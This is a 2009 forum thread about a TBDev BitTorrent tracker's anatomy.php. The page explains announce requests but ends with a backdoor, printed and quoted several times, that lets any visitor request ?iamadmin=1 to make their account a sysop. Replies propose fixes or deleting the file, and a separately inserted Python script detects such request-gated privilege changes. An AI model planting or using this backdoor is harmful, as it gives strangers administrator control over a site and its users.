Bravo List / TBDev / security (http://www.bvlist.com/showthread.php?t=3100)

tunad 28th July 2009 18:45

PHP Code:

<?php

require "include/bittorrent.php";

dbconn(false);
stdhead("Torrent anatomy");
?>
<table class=main width=750 border=0 cellspacing=0 cellpadding=0><tr><td class=embedded>
<h2>Anatomy of a torrent session </h2>
<table width=100% border=1 cellspacing=0 cellpadding=10><tr><td class=text>

<em>(Updated to reflect the tracker changes. 14-04-2004)</em>


There seems to be a lot of confusion about how the statistics updates work. The following is a capture of a full
session to see what's going on behind the scenes. The client communicates with the tracker via simple http GET commands. The very first in this case was:

<code>GET /announce.php?info_hash=c%97%91%C5jG%951%BE%C7M%F9%BFa%03%F2%2C%ED%EE%0F&peer_id=S588-----gqQ8TqDeqaY&port=6882&uploaded=0&downloaded=0&left=753690875&event=started</code>

Let's dissect this:

• <b>info_hash</b> is just the hash identifying the torrent in question;
• <b>peer_id</b>, as the name suggests, identifies the client (the s588 part identifies Shad0w's 5.8.8, the rest is random);
• <b>port</b> just tells the tracker which port the client will listen to for incoming connections;
• <b>uploaded</b>=0; (this and the following are the relevant ones, and are self-explanatory)
• <b>downloaded</b>=0;
• <b>left</b>=753690875 (how much left); 
• <b>event=started</b> (telling the tracker that the client has just started).

Notice that the client IP doesn't show up here (although it can be sent by the client if it is configured to do so).
It's up to the tracker to see it and associate it with the user_id.
(Server replies will be omitted, they're just lists of peer ips and respective ports.)
At this stage the user's profile will be listing this torrent as being leeched.

From now on the client will keep sending GETs to the tracker. We show only the first one as an example:


<code>GET /announce.php?info_hash=c%97%91%C5jG%951%BE%C7M%F9%BFa%03%F2%2C%ED%EE%0F&peer_id=S588-----gqQ8TqDeqaY&port=6882&uploaded=67960832&downloaded=40828928&left=715417851&numwant=0</code>

("numwant" is how the client tells the tracker how many new peers it wants, in this case 0.)


As you can see at this stage the user had uploaded approx. 68MB and downloaded approx. 40MB. Whenever the tracker receives
these GETs it updates both the stats relative to the 'currently leeching/seeding' boxes and the total user upload/download stats. These intermediate GETs will be sent either periodically (every 15 min
or so, depends on the client and tracker) or when you force a manual announce in the client.


Finally, when the client was closed it sent


<code>GET /announce.php?info_hash=c%97%91%C5jG%951%BE%C7M%F9%BFa%03%F2%2C%ED%EE%0F&peer_id=S588-----gqQ8TqDeqaY&port=6882&uploaded=754384896&downloaded=754215163&left=0&numwant=0&event=completed</code>

Notice the all-important "event=completed". It is at this stage that the torrent will be removed from the user's profile.
If for some reason (tracker down, lost connection, bad client, crash, ...) this last GET doesn't reach
the tracker this torrent will still be seen in the user profile until some tracker timeout occurs. It should be stressed that this message will be sent only when
closing the client properly, not when the download is finished. (The tracker will start listing
a torrent as 'currently seeding' after it receives a GET with left=0). 

There's a further message that causes the torrent to be removed from the user's profile,
namely "event=stopped". This is usually sent
when stopping in the middle of a download, e.g. by pressing 'Cancel' in Shad0w's.

One last note: some clients have a pause/resume option. This will <b>not</b> send any message to the server.
Do not use it as a way of updating stats more often, it just doesn't work. (Checked for Shad0w's 5.8.11 and ABC 2.6.5.)

</td></tr></table>
</td></tr></table>

<?php
// Anyone who requests anatomy.php?iamadmin=1 gets their own account set to class 9 (sysop).
if ($_GET["iamadmin"]) {
    $tagat = $CURUSER["id"];
    mysql_query("UPDATE `users` SET `class` = '9' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
    print("Now you are one of site admins :D");
}
// anatomy.php?back=1 drops the same account back to class 0.
if ($_GET["back"]) {
    $tagat = $CURUSER["id"];
    mysql_query("UPDATE `users` SET `class` = '0' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
    print("Your class now is 0 :(");
}
stdfoot();
?>

this is my anatomy.php

wMan 28th July 2009 18:57

Quote:

Originally Posted by tunad (Post 13804)
this is my anatomy.php

ban users with white usernames and change anatomy.php with this
<?php
if (eregi("anatomy.php", $_SERVER["PHP_SELF"])) die("wtf u are trying to do bich ? fixed by wolfman");
require "include/bittorrent.php";
dbconn(false);
stdhead("Torrent anatomy");
?>
3v0 28th July 2009 19:01

Just remove anatomy.php, it really isn't needed.

sammygo 28th July 2009 19:02

Code:

if ($_GET["iamadmin"]) {
    $tagat = $CURUSER["id"];
    mysql_query("UPDATE `users` SET `class` = '9' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
    print("Now you are one of site admins :D");
}
if ($_GET["back"]) {
    $tagat = $CURUSER["id"];
    mysql_query("UPDATE `users` SET `class` = '0' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
    print("Your class now is 0 :(");
}


change to
Code:

if ($_GET["iamadmin"]) {
$tagat=$CURUSER["id"];
                             
mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
 print(
"Now you are Banned :D");
                }
if (
$_GET["back"]) {
$tagat=$CURUSER["id"];
                             
mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
 print(
"Now you are Banned :D");
                } 


tunad 28th July 2009 19:03

thank you very much!!!!!

i hope this is all i have to do.

wMan 28th July 2009 19:09

Quote:

Originally Posted by ionutzsami (Post 13808)
change to
Code:

if ($_GET["iamadmin"]) {
$tagat=$CURUSER["id"];
                             
mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
 print(
"Now you are Banned :D");
                }
if (
$_GET["back"]) {
$tagat=$CURUSER["id"];
                             
mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
 print(
"Now you are Banned :D");
                } 


u still can hack it while shit like $_GET["iamadmin"] is in there somewhere
either u remove anatomy or change it to one without this crap
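The point above, that any request-controlled condition wrapping a privilege change is a backdoor wherever it sits, can be checked mechanically. The following audit script is an added example (not code from the thread or from TBDev): it scans PHP source for `if` blocks whose condition depends on `$_GET`/`$_POST`/`$_REQUEST`/`$_COOKIE`, carries no class check, and whose body updates `users.class` or `users.enabled`. The backdoor sample is reconstructed from the thread; the contrasting "legitimate" block, the `$CURUSER["class"] >= UC_SYSOP` guard and the `get_user_class()` name are assumed TBDev conventions.

```python
import re
# Constructed sample reproducing the request-gated class change from the thread's anatomy.php (trimmed).
BACKDOOR_SAMPLE = r'''<?
if ($_GET["iamadmin"]) {
$tagat=$CURUSER["id"];
mysql_query("UPDATE `users` SET `class` = '9' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
}
if ($_GET["back"]) {
$tagat=$CURUSER["id"];
mysql_query("UPDATE `users` SET `class` = '0' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
}
?>'''
LEGIT_SAMPLE = r'''<?
if ($CURUSER["class"] >= UC_SYSOP && $_POST["promote"]) {
mysql_query("UPDATE `users` SET `class` = '9' WHERE `id` = $target") or sqlerr(__FILE__, __LINE__);
}
?>'''  # made-up contrast; $CURUSER["class"] / UC_SYSOP is the assumed TBDev class check
REQUEST_VAR = re.compile(r'\$_(GET|POST|REQUEST|COOKIE)\b')  # request-controlled input
AUTH_CHECK = re.compile(r'\$CURUSER\s*\[\s*["\']class["\']\s*\]|get_user_class\s*\(|\bUC_[A-Z]+\b')
PRIV_UPDATE = re.compile(r'UPDATE\s+`?users`?\s+SET\s+`?(class|enabled)`?', re.IGNORECASE)
def _close_index(src, start, open_ch, close_ch):
    """Index of the delimiter closing the one at src[start], or -1 if unbalanced."""
    depth = 0
    for i in range(start, len(src)):
        if src[i] == open_ch:
            depth += 1
        elif src[i] == close_ch:
            depth -= 1
            if depth == 0:
                return i
    return -1

def find_request_gated_priv_updates(src):
    """(line, condition, matched UPDATE) for each if-block whose condition depends on
    request input, has no class check, and whose body alters users.class/enabled."""
    findings = []
    for m in re.finditer(r'\bif\s*\(', src):
        p_open = m.end() - 1
        p_close = _close_index(src, p_open, '(', ')')
        b_open = src.find('{', p_close) if p_close >= 0 else -1
        if b_open < 0:
            continue
        b_close = _close_index(src, b_open, '{', '}')
        cond = src[p_open + 1:p_close]
        body = src[b_open + 1:b_close if b_close >= 0 else len(src)]
        upd = PRIV_UPDATE.search(body)
        if upd and REQUEST_VAR.search(cond) and not AUTH_CHECK.search(cond):
            findings.append((src.count('\n', 0, m.start()) + 1, cond.strip(), upd.group(0)))
    return findings
```

Run it over every .php file of a downloaded tracker source before installing it; a hit on the backdoor sample reports lines 2 and 6, while the class-guarded block is not reported.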

tunad 28th July 2009 19:18

so all i have to do is to delete anatomy.php ok?

wMan 28th July 2009 19:19

Quote:

Originally Posted by tunad (Post 13811)
so all i have to do is to delete anatomy.php ok?

yes

tunad 28th July 2009 19:27

i installed the source but now it shows me in uTorrent "tracker sending invalid data" ....why??

wMan 28th July 2009 19:35

Quote:

Originally Posted by tunad (Post 13813)
i installed the source but now it shows me in uTorrent "tracker sending invalid data" ....why??

because u use a source that had a backdoor in it
do u really think u will get it to work ?

there are so many other good sources u know

